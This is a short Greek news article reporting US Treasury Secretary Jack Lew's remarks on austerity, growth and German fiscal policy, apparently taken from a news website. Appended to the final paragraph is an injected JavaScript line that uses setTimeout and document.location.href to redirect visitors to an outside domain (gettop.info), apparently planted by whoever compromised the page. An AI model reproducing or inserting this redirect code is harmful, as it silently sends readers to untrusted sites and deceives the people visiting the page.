Τζακ Λιου: H αντιπαράθεση ανάμεσα σε λιτότητα και ανάπτυξη τελείωσε

0
1
U.S. Treasury Secretary Jack Lew delivers remarks at the Peterson Institute for International Economics in Washington October 7, 2014. REUTERS/Jonathan Ernst (UNITED STATES - Tags: POLITICS BUSINESS)

 

Σε δημόσια συζήτηση συμμετείχε ο υπουργός Οικονομικών των ΗΠΑ Τζακ Λιου όπου δήλωσε πως «η αντιπαράθεση ανάμεσα σε λιτότητα και ανάπτυξη τελείωσε. Αυτήν τη στιγμή όλοι συμφωνούν ότι πρέπει να υποστηριχθεί η ανάπτυξη», γράφει στη διαδικτυακή της έκδοση η ιταλική La Stampa.

«Θα αφήσω τους Γερμανούς να μιλήσουν οι ίδιοι για τις θέσεις τους. Είχαμε, βέβαια, μαζί τους, ένα σαφές ποσοστό ασυμφωνιών σε σχέση με τις μακροοικονομικές πολιτικές των τελευταίων ετών, αλλά αν κοιτάξετε τις πολιτικές των τελευταίων δεκαοκτώ μηνών στην Ευρώπη, θα προσέξετε ότι μια σειρά πραγμάτων έχει αλλάξει», σημείωσε ο Λιου και συμπλήρωσε: «Δεν νομίζω ότι θα δούμε μια αλλαγή φιλοσοφίας στην Γερμανία, αλλά πιστεύω ότι διαπιστώσαμε ήδη μια αλλαγή σε επίπεδο δράσης».

Σύμφωνα με τον Αμερικανό υπουργό Οικονομικών, επιπλέον, «προέκυψε ήδη μια χαλάρωση των δημοσιονομικών στόχων για τις χώρες που έχουν δημοσιονομικά προβλήματα αλλά επλήγησαν σκληρά και από το κόστος της κρίσης των προσφύγων, και η Γερμανία το αποδέχθηκε. Το ίδιο το Βερολίνο προχώρησε σε όλες τις αναγκαίες δαπάνες, πέρα από το ύψος των δημοσιονομικών στόχων του, για να αντιμετωπίσει το μεταναστευτικό». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here